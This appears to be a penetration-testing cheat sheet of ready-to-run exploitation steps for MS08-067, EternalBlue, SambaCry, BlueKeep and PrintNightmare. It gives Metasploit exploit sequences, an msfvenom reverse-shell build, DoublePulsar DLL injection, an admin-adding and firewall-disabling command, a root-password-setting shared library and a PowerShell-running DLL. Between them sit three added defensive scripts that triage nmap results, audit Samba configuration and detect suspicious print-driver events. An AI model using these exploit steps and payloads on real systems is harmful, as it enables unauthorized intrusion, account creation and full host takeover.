# Low-Hanging Fruits

## net_api

**CVE-2008-4250, MS08-067**

Check with nmap:

```
$ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445
```

Or with Metasploit:

```
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > check
```

Exploit:

```
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
```

## EternalBlue

**CVE-2017-0144, MS17-010**

### Unauthenticated (FuzzBunch + Wine)

* <https://github.com/fuzzbunch/fuzzbunch>
* <https://github.com/nopernik/fuzzbunch_wrapper>
* <https://0x00sec.org/t/porting-the-leaked-equation-group-eqgrp-fuzzbunch-tool-to-linux/1956>
* <https://habr.com/ru/post/327490/>
* <https://codeby.net/threads/eternalblue-doublepulsar-exploit-in-metasploit-win-7-hack.59593/>

```
$ python2 fbcli.py eternalblue --TargetIp 192.168.1.11
$ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function Ping
$ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function RunDLL --DllPayload /tmp/createuser.dll --ProcessName spoolsv.exe
$ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function Uninstall
```

### Authenticated (Windows 2003 or R/W Pipe)

#### MSF

Check with nmap:

```
$ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445
```

Or with Metasploit:

```
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS file:smb.txt
msf > set THREADS 25
msf > run
```
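The nmap checks above (for MS08-067 as well as MS17-010) are easiest to triage across many hosts from XML output (`nmap -oX scan.xml ...`), since the `vulns` library that these scripts use writes a structured `state` element per CVE. The script below is an added example, not part of the original page or of nmap: it reads such a report, records the state for every `smb-vuln-*` result, keeps hosts where the script produced no result as UNKNOWN so they are not silently dropped, and lists the hosts reported vulnerable. The XML sample is constructed and trimmed to the elements the parser uses.

```python
"""Triage nmap `smb-vuln-*` results from an XML report (added example, not from the page)."""
import sys
import xml.etree.ElementTree as ET

# nmap script ids used by the checks on this page, mapped to the CVE each one tests for
SMB_VULN_SCRIPTS = {
    "smb-vuln-ms08-067": "CVE-2008-4250",
    "smb-vuln-ms17-010": "CVE-2017-0144",
}

# Constructed sample of `nmap -oX` output (trimmed): one vulnerable host, one host
# where the script could not negotiate SMB, and one patched host
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="10.10.13.37" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE: ... State: VULNERABLE">
        <table key="CVE-2017-0144">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <address addr="10.10.13.38" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="Could not negotiate a connection:SMB: Failed to receive bytes: ERROR"/>
    </hostscript>
  </host>
  <host>
    <address addr="10.10.13.39" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms08-067" output="NOT VULNERABLE">
        <table key="CVE-2008-4250"><elem key="state">NOT VULNERABLE</elem></table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""


def parse_smb_vuln_results(xml_text):
    """Return {ip: {cve: state}} for every smb-vuln-* hostscript in an nmap XML report.

    The state is read from the structured <elem key="state"> that nmap's vulns
    library emits; a script that produced no table (connection error, script
    failure) is recorded as UNKNOWN so the host still shows up for a re-check.
    """
    results = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        if addr is None:
            continue
        for script in host.iter("script"):
            cve = SMB_VULN_SCRIPTS.get(script.get("id"))
            if cve is None:
                continue
            state = "UNKNOWN"
            for table in script.findall("table"):
                elem = table.find("elem[@key='state']")
                if elem is not None and elem.text:
                    state = elem.text.strip()
            results.setdefault(addr, {})[cve] = state
    return results


def vulnerable_hosts(results):
    """Hosts with any state starting with VULNERABLE (also matches 'VULNERABLE (Exploitable)')."""
    return sorted(ip for ip, states in results.items()
                  if any(s.startswith("VULNERABLE") for s in states.values()))


def unknown_hosts(results):
    """Hosts where a check produced no result and should be re-scanned or checked by hand."""
    return sorted(ip for ip, states in results.items() if "UNKNOWN" in states.values())


if __name__ == "__main__":
    # usage: python triage.py scan.xml   (falls back to the constructed sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    parsed = parse_smb_vuln_results(text)
    for ip, states in sorted(parsed.items()):
        for cve, state in states.items():
            print(f"{ip}\t{cve}\t{state}")
    print("vulnerable:", ", ".join(vulnerable_hosts(parsed)) or "none")
    print("unknown:   ", ", ".join(unknown_hosts(parsed)) or "none")
```

The UNKNOWN bucket matters in practice: an SMB negotiation failure (firewall, SMB1 disabled, host busy) is not the same as "patched", and treating it that way is how vulnerable hosts fall out of a remediation list.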

Exploit with:

```
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
```

**EternalRomance / EternalSynergy / EternalChampion**

Exploit with `ms17_010_psexec`:

```
msf > use exploit/windows/smb/ms17_010_psexec
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
```

Exploit with `ms17_010_command`:

```
msf > use auxiliary/admin/smb/ms17_010_command
msf > set RHOSTS file:smb.txt
msf > set COMMAND "net user hax0r Passw0rd! /add && net localgroup administrators hax0r /add"
msf > run
```

#### Manually

* <https://github.com/helviojunior/MS17-010>
* <https://github.com/jdiazmx/MS17-010_WORAWIT>
* <https://0xdf.gitlab.io/2019/02/21/htb-legacy.html#ms-17-010>

Upload an MSF payload to the target and execute it with `send_and_execute.py`:

```
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
$ python send_and_execute.py 10.10.13.38 rev.exe
```

Or execute commands on the host directly via `zzz_exploit.py` (at least one named pipe must be accessible on the target):

```
$ python zzz_exploit.py 192.168.1.11
```

{% code title="zzz_exploit.py" %}

```python
# Replace the stock smb_pwn() in worawit's zzz_exploit.py with this one;
# service_exec() is the script's own helper that runs a command on the target
def smb_pwn(conn, arch):
    service_exec(conn, r'cmd /c net user hax0r Passw0rd! /add && cmd /c net localgroup administrators hax0r /add && cmd /c netsh firewall set opmode disable')
```

{% endcode %}

{% hint style="info" %}
For x86 EternalBlue shellcodes use [AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010) (very unstable).
{% endhint %}

To grab registry secrets in one shot, apply the `smb_get_file` patch to the same toolkit:

```
$ git clone https://github.com/worawit/MS17-010.git && cd MS17-010
$ git checkout -b smb_get_file 83b3745
$ wget https://gist.github.com/snovvcrash/e910523a366844448e3a2b40685969e7/raw/e00b7b04aa5c96b0e5f21eae305448cf3c2fd4fa/zzz_smb_get_file.patch
$ git apply zzz_smb_get_file.patch
```

## SambaCry

**CVE-2017-7494** (Samba 3.5.0 and later; fixed in 4.4.14 / 4.5.10 / 4.6.4)

### MSF

```
msf > use exploit/linux/samba/is_known_pipename
msf > set SMB::AlwaysEncrypt false
msf > set SMB::ProtocolVersion 1
msf > run
```

### Manually

* <https://github.com/opsxcq/exploit-CVE-2017-7494>
* <https://github.com/joxeankoret/CVE-2017-7494>

Compile the `.so` payload (a shared library whose constructor runs as soon as smbd loads it):

{% code title="pwn.c" %}

```c
// gcc -shared -fPIC -o pwn.so pwn.c

#define _GNU_SOURCE     // setresuid() is a GNU extension in glibc
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>     // setresuid()

// Constructor: runs automatically when smbd loads the library
static void pwn(void) __attribute__((constructor));

static void pwn(void) {
    setresuid(0, 0, 0);
    system("echo 'root:Passw0rd!'|chpasswd");
}
```

{% endcode %}

Get the share's real path on the target's filesystem:

```
$ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37
path:    /home/snovvcrash/sharename
```

Upload `pwn.so` to the target share and then run the exploit:

```
$ pip install virtualenv
$ virtualenv -p /usr/bin/python2.7 venv
$ . venv/bin/activate
$ pip install -r requirements.txt
$ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p ''
```
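The exploit above needs three things to line up: a Samba build inside the affected version range, a share the client can write to, and a server that still opens named pipes from share paths. The script below is an added example (not from the page or from either linked repository) that audits a host for those conditions from the defending side: it applies the version range stated at the top of this section to the output of `smbd --version`, and checks an `smb.conf` for the Samba project's published workaround `nt pipe support = no` in `[global]` and for guest-writable shares. The two `smb.conf` fragments are constructed, one with the weak defaults and one with the workaround; the share check handles the `writable`/`writeable`/`read only` spellings but not every Samba synonym (`public`, `write ok`), so treat it as a starting point rather than a full config parser.

```python
"""Audit a Samba host for CVE-2017-7494 exposure from its version and smb.conf (added example)."""
import configparser
import re

# Version range the page states: 3.5.0 and later, fixed in 4.4.14 / 4.5.10 / 4.6.4
FIXED_IN = {(4, 4): (4, 4, 14), (4, 5): (4, 5, 10), (4, 6): (4, 6, 4)}


def samba_version_affected(version_string):
    """True if the version (e.g. 'Version 4.6.2-Ubuntu' from `smbd --version`) predates the fix."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", version_string)
    if not m:
        raise ValueError(f"unrecognised Samba version: {version_string!r}")
    v = tuple(int(x) for x in m.groups())
    if v < (3, 5, 0):
        return False
    branch = v[:2]
    if branch in FIXED_IN:
        return v < FIXED_IN[branch]
    # branches older than 4.4 were out of support when the fix shipped; 4.7+ were released fixed
    return branch < (4, 4)


# Constructed smb.conf fragments: the weak defaults beside the advisory's workaround
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server role = standalone server
   map to guest = Bad User

[public]
   path = /srv/samba/public
   guest ok = yes
   writable = yes
"""

HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server role = standalone server
   nt pipe support = no   ; CVE-2017-7494 workaround (breaks some Windows client features)

[public]
   path = /srv/samba/public
   guest ok = yes
   read only = yes
"""


def parse_smb_conf(text):
    """smb.conf is ini-style: '#' and ';' comments, keys may contain spaces, yes/no booleans."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, empty_lines_in_values=False,
                                   comment_prefixes=("#", ";"), inline_comment_prefixes=("#", ";"))
    cp.read_string(text)
    return cp


def _section(cp, name):
    """Samba section names are case-insensitive; configparser's are not."""
    return next((s for s in cp.sections() if s.lower() == name.lower()), None)


def nt_pipe_support_disabled(cp):
    """True if [global] sets 'nt pipe support = no' (default is yes)."""
    g = _section(cp, "global")
    return g is not None and not cp.getboolean(g, "nt pipe support", fallback=True)


def guest_writable_shares(cp):
    """Shares a guest could write to: the precondition for planting a library the server will load."""
    shares = []
    for s in cp.sections():
        if s.lower() in ("global", "homes", "printers"):
            continue
        writable = (cp.getboolean(s, "writable", fallback=False)
                    or cp.getboolean(s, "writeable", fallback=False)
                    or not cp.getboolean(s, "read only", fallback=True))
        if writable and cp.getboolean(s, "guest ok", fallback=False):
            shares.append(s)
    return shares


def assess(version_string, smb_conf_text):
    """Combine the three conditions into one verdict with the individual findings."""
    cp = parse_smb_conf(smb_conf_text)
    findings = {
        "version_affected": samba_version_affected(version_string),
        "workaround_applied": nt_pipe_support_disabled(cp),
        "guest_writable_shares": guest_writable_shares(cp),
    }
    findings["exposed"] = (findings["version_affected"] and not findings["workaround_applied"]
                           and bool(findings["guest_writable_shares"]))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(label, assess("Version 4.6.2-Ubuntu", conf))
```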

## BlueKeep

**CVE-2019-0708**

Check:

```
msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf > set RHOSTS file:rdp.txt
msf > set THREADS 25
msf > run
```

Exploit:

```
msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf > set RHOSTS file:rdp.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
```

## PrintNightmare

**CVE-2021-1675, CVE-2021-34527**

* <https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html>
* <https://pentestlab.blog/2021/08/17/domain-escalation-printnightmare/>
* <https://itm4n.github.io/printnightmare-exploitation/>

### Check

#### CrackMapExec

* <https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/modules/spooler.py>

```
$ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M spooler
```

#### ItWasAllADream

* <https://github.com/byt3bl33d3r/ItWasAllADream>

```
$ poetry run itwasalladream -d megacorp.local -u snovvcrash -p 'Passw0rd!' 192.168.1.0/24; cat "report_`date +'%Y_%m_%d_%H%M'`"* | grep -P '\d+\.\d+\.\d+\.\d+,Yes'
```
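The two checks above tell you which hosts expose a reachable spooler; on the defending side the complementary signal is the spooler's own event log, which records every driver install and every plug-in it fails to load. The script below is an added example, not from the page or from any of the linked projects: it runs over exported events (the JSON-like dictionaries are constructed, with message text approximating the real `Microsoft-Windows-PrintService` wording) and flags event 316 ("Printer driver ... was added or updated") when the file list names something outside a trusted set, flags event 808 ("The print spooler failed to load a plug-in module") with the offending path, and correlates hosts that show both. The trusted-file set is an assumption and should be rebuilt from a clean baseline of the environment's own drivers.

```python
"""Flag PrintNightmare-style driver installs in exported Windows event logs (added example)."""
import re
from collections import defaultdict

PRINT_CHANNEL = "Microsoft-Windows-PrintService"

# Files a stock Microsoft Universal / Text-Only driver ships with; anything else listed in a
# 316 event deserves a look. Assumed starting set: extend it from a clean baseline.
TRUSTED_DRIVER_FILES = {
    "UNIDRV.DLL", "UNIDRVUI.DLL", "UNIRES.DLL", "STDNAMES.GPD",
    "TTY.GPD", "TTYRES.DLL", "TTYUI.DLL",
}

# Constructed sample events in the shape of a JSON export (one dict per record)
SAMPLE_EVENTS = [
    {"Computer": "PRINT01", "Channel": PRINT_CHANNEL + "/Operational", "EventID": 307,
     "Message": "Document 12, Print Document owned by alice on \\\\WS07 was printed on Generic / Text Only."},
    {"Computer": "PRINT01", "Channel": PRINT_CHANNEL + "/Operational", "EventID": 316,
     "Message": "Printer driver Generic / Text Only for Windows x64 Version-3 was added or updated. "
                "Files:- UNIDRV.DLL, UNIDRVUI.DLL, TTY.GPD. No user action is required."},
    {"Computer": "DC01", "Channel": PRINT_CHANNEL + "/Operational", "EventID": 316,
     "Message": "Printer driver 1234 for Windows x64 Version-3 was added or updated. "
                "Files:- UNIDRV.DLL, kernelbase.dll, pwn.dll. No user action is required."},
    {"Computer": "DC01", "Channel": PRINT_CHANNEL + "/Admin", "EventID": 808,
     "Message": "The print spooler failed to load a plug-in module "
                "C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\pwn.dll, error code 0x45A. "
                "See the event user data for context information."},
]


def _driver_files(message):
    """Pull the comma-separated file list out of a 316 message."""
    m = re.search(r"Files:-\s*(.*?)\.\s*No user action", message, re.S)
    return [f.strip() for f in m.group(1).split(",") if f.strip()] if m else []


def detect_printnightmare(events, trusted=TRUSTED_DRIVER_FILES):
    """Return one finding per suspicious PrintService event, in input order."""
    findings = []
    for ev in events:
        if not ev.get("Channel", "").startswith(PRINT_CHANNEL):
            continue
        eid, msg, host = ev.get("EventID"), ev.get("Message", ""), ev.get("Computer", "?")
        if eid == 316:
            untrusted = [f for f in _driver_files(msg) if f.upper() not in trusted]
            if untrusted:
                findings.append({"host": host, "event_id": 316,
                                 "detail": "driver added with unexpected files: " + ", ".join(untrusted)})
        elif eid == 808:
            m = re.search(r"plug-in module (\S+?),", msg)
            findings.append({"host": host, "event_id": 808,
                             "detail": "spooler failed to load plug-in " + (m.group(1) if m else "<unparsed>")})
    return findings


def hosts_with_both(findings):
    """Hosts showing a suspicious driver add and a failed plug-in load: escalate these first."""
    seen = defaultdict(set)
    for f in findings:
        seen[f["host"]].add(f["event_id"])
    return sorted(h for h, ids in seen.items() if {316, 808} <= ids)


if __name__ == "__main__":
    found = detect_printnightmare(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['host']}\t{f['event_id']}\t{f['detail']}")
    print("escalate:", ", ".join(hosts_with_both(found)) or "none")
```

A 316 on its own is routine on print servers, which is why the file list rather than the event id carries the signal; an 808 pointing into `spool\DRIVERS\x64\3` is rare in normal operation and worth a look even without a matching 316.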

### Exploit

#### C/C++

RCE (fork of the original repo):

* <https://github.com/afwu/PrintNightmare>

LPE:

* <https://github.com/hlldz/CVE-2021-1675-LPE>

#### Python

RCE:

* <https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py>
* <https://github.com/cube0x0/CVE-2021-1675/blob/main/SharpPrintNightmare/CVE-2021-1675.py>
* <https://www.hackthebox.eu/blog/windows-protocols-python>

**Usage**

1. Prepare [an SMB share with anonymous authentication](https://github.com/snovvcrash/PPN/blob/master/pentest/infrastructure/ad/smb-rpc.md#smb-share-with-null-authentication) allowed (`smbserver.py` also works).
2. Generate an evil DLL: a C2 stager, an add-user-to-privileged-group payload ([1](https://github.com/newsoft/adduser), [2](https://github.com/calebstewart/CVE-2021-1675/blob/main/nightmare-dll/nightmare/dllmain.cpp), [3](https://github.com/calebstewart/CVE-2021-1675/tree/main/nightmare-dll), etc.) or a [custom](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking#your-own) command (see example below).
3. Run the exploit:

```
$ python CVE-2021-1675.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 '\\10.10.13.37\share\pwn.dll'
```

{% code title="pwn.c" %}

```c
// x86_64-w64-mingw32-gcc pwn.c -o pwn.dll -shared

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

// Thread routine started from DllMain once the DLL is loaded;
// replace the placeholder with the base64-encoded PowerShell to run
DWORD WINAPI Entry(LPVOID lpParam) {
    (void)lpParam;
    system("powershell -enc <BASE64_PWSH_CODE>");
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            // Run the payload on its own thread so DllMain returns promptly
            CreateThread(NULL, 0, Entry, NULL, 0, NULL);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}
```

{% endcode %}

{% embed url="https://snovvcrash.github.io/2021/06/30/leveraging-printnightmare-to-abuse-rbcd.html" %}

#### C#

RCE + LPE:

* <https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare>

#### PowerShell

LPE:

* <https://github.com/calebstewart/CVE-2021-1675>

### Reproducibility

Flowchart by [@wdormann](https://twitter.com/wdormann):

{% embed url="https://twitter.com/wdormann/status/1412906574998392840" %}

### Mitigation

* <https://github.com/LaresLLC/CVE-2021-1675>
